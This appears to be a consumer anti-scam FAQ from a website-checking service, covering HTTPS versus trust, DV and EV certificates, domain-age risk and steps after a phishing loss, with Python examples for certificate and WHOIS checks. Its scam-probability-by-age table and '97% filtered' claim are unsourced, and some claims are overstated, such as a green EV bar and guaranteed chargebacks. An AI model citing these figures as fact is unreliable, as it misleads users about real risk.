  • HTTPS only means: “Connection is encrypted” (prevents eavesdropping)
  • HTTPS does NOT mean: “Website is trustworthy”

What HTTPS Actually Protects:

HTTPS Does:

  • ✅ Encrypt data between you and server
  • ✅ Prevent ISP from seeing your traffic
  • ✅ Protect against man-in-the-middle attacks
  • ✅ Verify you’re connected to the domain in address bar

HTTPS Does NOT:

  • ❌ Verify the business is legitimate
  • ❌ Guarantee website safety
  • ❌ Prevent phishing/scams
  • ❌ Check domain age or reputation

Example Scam with HTTPS:

Legitimate PayPal:

URL: https://www.paypal.com
SSL: Valid, issued to PayPal Inc.
Certificate: Extended Validation (EV)
Company: PayPal Inc., verified entity

Scam Site with HTTPS:

URL: https://paypa1-secure.com
SSL: Valid, issued by Let's Encrypt ✅ (FREE certificate)
Certificate: Domain Validation (DV) - no business verification
Domain Age: 8 days old ❌
WHOIS: Privacy protected ❌
Company: Not verified ❌

Both have HTTPS, but only one is legitimate!

Why Scammers Use HTTPS:

  1. Browser warnings: HTTP shows “Not Secure” → scares visitors
  2. User trust: People think HTTPS = safe
  3. Free certificates: Let’s Encrypt automated, instant
  4. Legitimacy appearance: Looks professional

How to Properly Verify:

Don’t Just Check:

  • ❌ Padlock icon alone

Do Check:

  1. Domain spelling: Exact match to real company
  2. Certificate issuer: EV certificate for banks (green bar)
  3. Domain age: 30+ days minimum
  4. WHOIS data: Registered to legitimate company
  5. Contact info: Verifiable phone, address
  6. Reviews: Google, BBB, Trustpilot

Certificate Types:

Domain Validation (DV) - Low Trust:

  • Verifies: You control the domain
  • Cost: Free (Let’s Encrypt)
  • Issue time: Minutes (automated)
  • Used by: 95% of websites (legit + scams)
  • ⚠️ Scammers can get these easily

Extended Validation (EV) - High Trust:

  • Verifies: Legal business entity (extensive documentation)
  • Cost: $100-500/year
  • Issue time: Days (manual verification)
  • Used by: Banks, financial institutions
  • Browser: Shows company name in address bar (some browsers)
  • ✅ Scammers rarely use (expensive, requires documentation)

Checking Certificate Type:

Browser:

1. Click padlock icon
2. View certificate
3. Look for:
   DV: Only domain name in subject
   EV: Company name, verified legal entity

What Banks Use:

Bank of America: EV Certificate ✅
Chase: EV Certificate ✅
Wells Fargo: EV Certificate ✅

Scam bank sites: DV Certificate ❌ (or self-signed)

Bottom Line:

  • HTTPS = Encrypted connection (prevents snooping)
  • HTTPS ≠ Trustworthy website
  • Always verify domain, age, contact info, reviews
  • Use our Scam Detector for comprehensive analysis
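The certificate checks from Step 2 and the DV/EV distinction above, as an added example that is not part of this guide's tooling. It works on the dictionary shape that Python's `ssl.SSLSocket.getpeercert()` returns; the three records are constructed illustrations (the bank, CA and `.test` hostnames are placeholders, not real certificates), and the EV test relies on the `businessCategory` and `jurisdiction*` subject fields that EV certificates carry.

```python
import ssl

# Constructed records in getpeercert() shape; not real certificates
EV_BANK_CERT = {
    "subject": (
        (("businessCategory", "Private Organization"),),
        (("jurisdictionCountryName", "US"),),
        (("serialNumber", "0000000"),),
        (("countryName", "US"),),
        (("organizationName", "Example Bank, N.A."),),
        (("commonName", "www.example-bank.test"),),
    ),
    "issuer": ((("organizationName", "Example Public CA"),), (("commonName", "Example EV CA"),)),
    "subjectAltName": (("DNS", "www.example-bank.test"), ("DNS", "example-bank.test")),
    "notAfter": "Dec 31 23:59:59 2030 GMT",
}

DV_SCAM_CERT = {
    "subject": ((("commonName", "paypa1-secure.com"),),),
    "issuer": ((("organizationName", "Let's Encrypt"),),),
    "subjectAltName": (("DNS", "paypa1-secure.com"),),
    "notAfter": "Jan 15 12:00:00 2026 GMT",
}

SELF_SIGNED_CERT = {
    "subject": ((("commonName", "bank-login.test"),),),
    "issuer": ((("commonName", "bank-login.test"),),),
    "subjectAltName": (("DNS", "bank-login.test"),),
    "notAfter": "Jan 15 12:00:00 2030 GMT",
}


def rdn_fields(rdn_sequence):
    """Flatten getpeercert()'s nested subject/issuer tuples into a dict."""
    return {key: value for rdn in rdn_sequence for key, value in rdn}


def validation_level(cert):
    """DV: only a domain name in the subject. OV: an organization was vetted.
    EV: organization plus the businessCategory/jurisdiction fields."""
    subject = rdn_fields(cert.get("subject", ()))
    if "businessCategory" in subject and any(k.startswith("jurisdiction") for k in subject):
        return "EV"
    if "organizationName" in subject:
        return "OV"
    return "DV"


def is_self_signed(cert):
    return rdn_fields(cert.get("subject", ())) == rdn_fields(cert.get("issuer", ()))


def name_matches(cert, hostname):
    """Exact match against the SAN DNS names (falling back to the CN);
    a wildcard covers exactly one label."""
    names = [v.lower() for t, v in cert.get("subjectAltName", ()) if t == "DNS"]
    if not names:
        names = [rdn_fields(cert.get("subject", ())).get("commonName", "").lower()]
    host = hostname.lower().rstrip(".")
    for name in names:
        if name == host:
            return True
        if name.startswith("*.") and host.count(".") == name.count(".") and host.endswith(name[1:]):
            return True
    return False


def is_expired(cert, now_ts=None):
    """now_ts: POSIX timestamp to compare against (defaults to the current time)."""
    if now_ts is None:
        import time
        now_ts = time.time()
    return now_ts > ssl.cert_time_to_seconds(cert["notAfter"])


def assess_certificate(cert, hostname, now_ts=None):
    """Run the padlock checks from Step 2 and return the validation level and findings."""
    findings = []
    level = validation_level(cert)
    if not name_matches(cert, hostname):
        findings.append(f"certificate is not issued to {hostname}")
    if is_expired(cert, now_ts):
        findings.append("certificate has expired")
    if is_self_signed(cert):
        findings.append("self-signed certificate (scam indicator)")
    if level == "DV":
        findings.append("DV certificate: domain control only, no business verification")
    return {"validation": level, "findings": findings}


if __name__ == "__main__":
    print(assess_certificate(EV_BANK_CERT, "www.example-bank.test"))
    print(assess_certificate(DV_SCAM_CERT, "paypa1-secure.com"))
    print(assess_certificate(SELF_SIGNED_CERT, "bank-login.test"))
```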

Q: How old should a domain be to trust it?

A: Minimum 30 days, but 90+ days is safer. Here’s why:

Scam Domain Lifespan Statistics:

Age Range      Scam Probability   Explanation
──────────────────────────────────────────────────────────────────────
0-7 days       97%                Fresh phishing attack
8-14 days      85%                Active scam campaign
15-30 days     75%                Scam or very new business
31-90 days     40%                Startup or scam (verify independently)
91-365 days    15%                Established presence (lower risk)
1-2 years      5%                 Legitimate business
3+ years       <2%                Trusted, long-standing site
10+ years      <0.5%              Highly trusted (Amazon, Google, etc.)

Why Scammers Use New Domains:

Economics:

Domain cost: $10-15/year
Attack window: 24-72 hours
Victim count: 5-50 victims
Average loss: $1,000-5,000 per victim
ROI: 500-25,000% (highly profitable)

Disposal Strategy:

Day 1: Register domain, clone target site
Day 2-3: Send phishing emails, steal credentials
Day 4: Domain blacklisted, shut down
Day 5: Register new domain, repeat

Age-Based Trust Levels:

0-30 Days (HIGH RISK):

Assumptions:
  - 97% of phishing sites
  - Scammer testing attack
  - Not yet blacklisted

Action:
  ❌ Do NOT enter personal info
  ❌ Do NOT make payments
  ✅ Only proceed if:
      - Verified business registration
      - Called company directly
      - Confirmed social media
      - Found press mentions

31-90 Days (MEDIUM RISK):

Could be:
  - Legitimate startup
  - New product launch
  - Rebranded company
  - Scam that survived 30 days

Action:
  ⚠️ Proceed with caution
  ✅ Verify independently:
      - Business license
      - BBB registration
      - Physical address (visit or call)
      - Company registration
      - LinkedIn profiles of employees

91-365 Days (LOW RISK):

Likely:
  - Established business
  - Survived initial startup phase
  - Built some reputation

Action:
  ✅ Check reviews (Trustpilot, Google, BBB)
  ✅ Verify contact information
  ✅ Still run scam detector (rare exceptions exist)

1+ Years (VERY LOW RISK):

Highly likely:
  - Legitimate, established business
  - Invested in long-term presence
  - Built customer base

Action:
  ✅ Standard verification (reviews, contact info)
  ✅ Trust but verify

Checking Domain Age:

Method 1: Our Tool

Visit: /domain-age
Enter: example.com
Result:
  Creation Date: 1995-08-14
  Age: 29 years, 3 months
  Risk: ✅ Trusted

Method 2: WHOIS Lookup

whois example.com | grep -i "creation date"
Creation Date: 1995-08-14T04:00:00Z

Calculate age: Current date - Creation date

Method 3: Archive.org

Visit: https://web.archive.org/
Enter: example.com
View: Historical snapshots

Shows:
  - First snapshot date (confirms age)
  - Design changes over time
  - Legitimate businesses have long history
  - Scams have no/fake history
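Method 2 above carried through in code, combined with the age table from the start of this answer: an added example that is not part of this guide's tooling. It pulls the creation date out of raw `whois` output, computes the age against a fixed reference date (constructed, so the result is reproducible) and maps it to the table's risk buckets. The WHOIS snippets are constructed; only the example.com creation date comes from the text, and the alternative field labels in the regex are an assumption about registry variants.

```python
import re
from datetime import datetime, timezone

# Buckets from the "Scam Domain Lifespan Statistics" table:
# (upper bound in days, scam probability, label). 1-2 years is taken to
# run up to the 3-year bucket that follows it.
AGE_BUCKETS = [
    (7, "97%", "HIGH RISK - fresh phishing attack"),
    (14, "85%", "HIGH RISK - active scam campaign"),
    (30, "75%", "HIGH RISK - scam or very new business"),
    (90, "40%", "MEDIUM RISK - startup or scam, verify independently"),
    (365, "15%", "LOW RISK - established presence"),
    (3 * 365, "5%", "VERY LOW RISK - legitimate business"),
    (10 * 365, "<2%", "TRUSTED - long-standing site"),
]
OLDEST = ("<0.5%", "HIGHLY TRUSTED - 10+ years")

# "Creation Date" is the label shown in Method 2; the others are assumed variants
CREATION_RE = re.compile(
    r"^\s*(?:Creation Date|created|Registered on|Registration Date)\s*:\s*(\S+)",
    re.IGNORECASE | re.MULTILINE,
)

# Constructed WHOIS excerpts (only the example.com creation date is from the text)
EXAMPLE_WHOIS = """\
Domain Name: EXAMPLE.COM
Updated Date: 2024-08-14T07:01:34Z
Creation Date: 1995-08-14T04:00:00Z
Registry Expiry Date: 2026-08-13T04:00:00Z
"""
FRESH_WHOIS = """\
Domain Name: PAYPAL-VERIFY.TK
Creation Date: 2025-11-07T10:12:00Z
"""
NO_DATE_WHOIS = "Domain Name: EXAMPLE.TK\nNo match for domain\n"

# Fixed reference date so the ages below are reproducible (constructed)
TODAY = datetime(2025, 11, 15, tzinfo=timezone.utc)


def parse_creation_date(whois_text):
    """Return the creation date as an aware datetime, or None if absent/unparsable."""
    match = CREATION_RE.search(whois_text)
    if not match:
        return None
    raw = match.group(1).replace("Z", "+00:00")  # ISO 8601 'Z' for older Pythons
    try:
        created = datetime.fromisoformat(raw)
    except ValueError:
        return None
    if created.tzinfo is None:
        created = created.replace(tzinfo=timezone.utc)
    return created


def domain_age_days(whois_text, today):
    """Calendar days between the creation date and today (None if unknown)."""
    created = parse_creation_date(whois_text)
    if created is None:
        return None
    return (today.date() - created.date()).days


def age_risk(days):
    """Map an age in days to (scam probability, label) from the table."""
    if days is None:
        return ("unknown", "UNKNOWN - no creation date in WHOIS, treat as new")
    for limit, probability, label in AGE_BUCKETS:
        if days <= limit:
            return (probability, label)
    return OLDEST


if __name__ == "__main__":
    for name, text in [("example.com", EXAMPLE_WHOIS), ("paypal-verify.tk", FRESH_WHOIS),
                       ("example.tk", NO_DATE_WHOIS)]:
        days = domain_age_days(text, TODAY)
        print(f"{name}: {days} days old -> {age_risk(days)}")
```

A missing creation date is treated as a new domain on purpose: registries that hide it, or names that are not in WHOIS at all, should not fall through to a trusted bucket.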

Exceptions (New Domains That Are Safe):

Product Launches:

Example: iPhone 15 Pro launch
  - Apple registers iphone15pro.com
  - Domain age: 7 days
  - BUT: Announced by Apple officially
  - Verify: apple.com announcement

Action: Verify through main company site

Rebranding:

Example: Twitter → X
  - x.com registered in 1996 but repurposed 2023
  - New branding announced officially
  - Redirects from twitter.com

Action: Check for official announcement

Country-Specific Domains:

Example: Company expands to new country
  - amazon.com.au (Australia)
  - May be newer than amazon.com
  - BUT: Registered by same company

Action: Verify parent company owns domain

How to Verify New Domains:

Business Registration:

1. Search: "[State] Secretary of State business search"
2. Enter company name
3. Verify:
   - Active status
   - Registration date matches or predates domain
   - Registered agent address

Press Mentions:

Google News: "[company name]"
Check:
  - Legitimate press (not just press releases)
  - Announced product/service
  - Quoted executives (verify on LinkedIn)

Social Media:

Find official accounts:
  - Twitter/X verification badge
  - Facebook verified page
  - LinkedIn company page
  - Check follower counts (thousands+)
  - Look for established history (years of posts)

Bottom Line:

  • 30 days minimum (97% of scams filtered out)
  • 90 days recommended (safer threshold)
  • 1+ year ideal (very low risk)
  • New domains: Verify through official channels first
  • Use tools: Our Domain Age Checker for instant verification

Q: What should I do if I entered my information on a scam site?

A: Act immediately! Time is critical. Follow these steps in order:

IMMEDIATE (Next 15 Minutes):

1. Change Passwords (Most Critical)

Priority order:
✅ Email (FIRST - controls password resets)
✅ Banking/financial accounts
✅ PayPal, Venmo, payment apps
✅ Social media (Facebook, Instagram, Twitter)
✅ Shopping sites (Amazon, eBay)
✅ All other accounts

Password requirements:
  - Unique (different for each account)
  - Strong (12+ characters, mixed case, numbers, symbols)
  - Not reused from scam site
  - Use password manager (LastPass, 1Password, Bitwarden)

2. Enable Two-Factor Authentication (2FA)

Enable on ALL accounts:
  ✅ Email (Gmail, Outlook)
  ✅ Banking
  ✅ Social media
  ✅ Payment apps

Preferred methods (in order):
  1. Hardware key (YubiKey, Google Titan)
  2. Authenticator app (Google Authenticator, Authy)
  3. SMS (better than nothing, but can be hijacked)

3. Contact Your Bank/Card Issuer

Credit Card:
  - Call number on back of card
  - Report: "Fraudulent website, potential unauthorized charges"
  - Request: Card freeze or replacement
  - Result: Charges reversed (Visa/Mastercard protection)

Debit Card:
  - Call bank immediately
  - Request: Account freeze
  - Monitor: Unauthorized transactions
  - File: Fraud claim (less protection than credit cards)

Bank Account:
  - If you provided routing/account number
  - Request: Account number change
  - Monitor: ACH withdrawals
  - Enable: Transaction alerts

WITHIN 1 HOUR:

4. Check for Fraudulent Activity

Email:
  - Check sent folder (scammers may send emails as you)
  - Review login history (Gmail: Details link, Outlook: Recent activity)
  - Check filters (scammers may hide notifications)

Bank:
  - Review all recent transactions
  - Set up: Mobile alerts for all transactions >$0
  - Check: Pending transactions

Credit Cards:
  - Review charges
  - Dispute: Any fraudulent transactions
  - Freeze: Card if any suspicious activity

5. Run Security Scans

Antivirus:
  - Windows Defender (Windows)
  - Update definitions
  - Run full scan

Malware Scanner:
  - Download: Malwarebytes (free)
  - Run: Full system scan
  - Quarantine: Any threats found

Browser:
  - Clear: Cache, cookies, history
  - Check: Installed extensions (remove suspicious)
  - Reset: Browser settings (if malware suspected)

WITHIN 24 HOURS:

6. File Official Reports

Federal Trade Commission (FTC):
  URL: https://reportfraud.ftc.gov/
  Provide:
    - Scam website URL
    - Date, time, amount
    - Information provided
    - Screenshots (if available)

FBI Internet Crime Complaint Center (IC3):
  URL: https://www.ic3.gov/
  For: Financial crimes over $1,000
  Include: All transaction details

Local Police:
  - File report (get case number)
  - Bring: Printed evidence
  - Needed for: Identity theft affidavit

7. Monitor Your Identity

Credit Freeze (FREE):
  - Equifax: https://www.equifax.com/personal/credit-report-services/credit-freeze/
  - Experian: https://www.experian.com/freeze/center.html
  - TransUnion: https://www.transunion.com/credit-freeze

  Effect: Prevents new accounts from being opened

Fraud Alert (FREE):
  - Call one bureau (they notify others)
  - Duration: 1 year (renewable)
  - Effect: Creditors must verify identity before issuing credit

Credit Monitoring:
  - Free: Credit Karma, Mint
  - Paid: IdentityGuard, LifeLock ($10-30/month)
  - Watch for: Unauthorized accounts, inquiries

WITHIN 1 WEEK:

8. Request Credit Reports

Free Annual Report:
  URL: https://www.annualcreditreport.com/
  Frequency: Once per year per bureau (3 total)

Check for:
  ✅ Unknown accounts
  ✅ Unauthorized inquiries
  ✅ Incorrect personal info
  ✅ Fraudulent addresses

Dispute Process:
  - Online dispute (fastest)
  - Provide evidence
  - Follow up in 30 days

9. Social Security Monitoring (If SSN Provided)

If you gave SSN to scam:
  ⚠️ High risk of identity theft

Immediate:
  - Credit freeze (all 3 bureaus)
  - File identity theft report: IdentityTheft.gov
  - Consider: IRS PIN (prevents tax fraud)

IRS IP PIN:
  URL: https://www.irs.gov/identity-theft-fraud-scams/get-an-identity-protection-pin
  Prevents: Tax refund fraud
  Free: For previous victims or at-risk individuals

10. Help Take Down Scam Site

Report to Registrar:
  1. WHOIS lookup: Find domain registrar
  2. Visit registrar's abuse page
  3. Submit: Phishing/scam report with evidence

Report to Hosting Provider:
  1. IP WHOIS: Find hosting company
  2. Email: abuse@[hosting-company].com
  3. Include: Full details, screenshots

Google Safe Browsing:
  URL: https://safebrowsing.google.com/safebrowsing/report_phish/
  Effect: Chrome may block site for other users

PhishTank:
  URL: https://www.phishtank.com/add_web_phish.php
  Effect: Shared with security vendors

ONGOING:

11. Stay Vigilant

Next 90 days:
  ✅ Check bank statements daily
  ✅ Review credit card charges
  ✅ Monitor credit reports monthly
  ✅ Watch for phishing emails (scammers may retry)
  ✅ Be suspicious of calls/emails requesting info

Next 12 months:
  ✅ Keep credit freeze active
  ✅ Renew fraud alert
  ✅ Check credit reports quarterly
  ✅ Document all suspicious activity

What NOT to Do:

❌ Wait to “see what happens” (act immediately)
❌ Reuse the compromised password anywhere
❌ Contact scammers (ignore their follow-up emails)
❌ Pay “recovery fees” (scam-within-a-scam)
❌ Panic (follow steps methodically)

Resources:

  • IdentityTheft.gov: Personalized recovery plan
  • FTC Scam Alerts: Latest scam warnings
  • Credit Karma: Free credit monitoring
  • Our Scam Detector: Verify sites before entering info

Prevention Next Time:

  • ✅ Use our Scam Detector before entering info
  • ✅ Check Domain Age (30+ days minimum)
  • ✅ Verify SSL Certificate validity
  • ✅ Never click email links (navigate directly to sites)
  • ✅ Use virtual credit cards (Privacy.com, Revolut)
  • ✅ Enable 2FA everywhere

Ready to check if a website is safe?

👉 Analyze Website Now

Last updated: November 2025
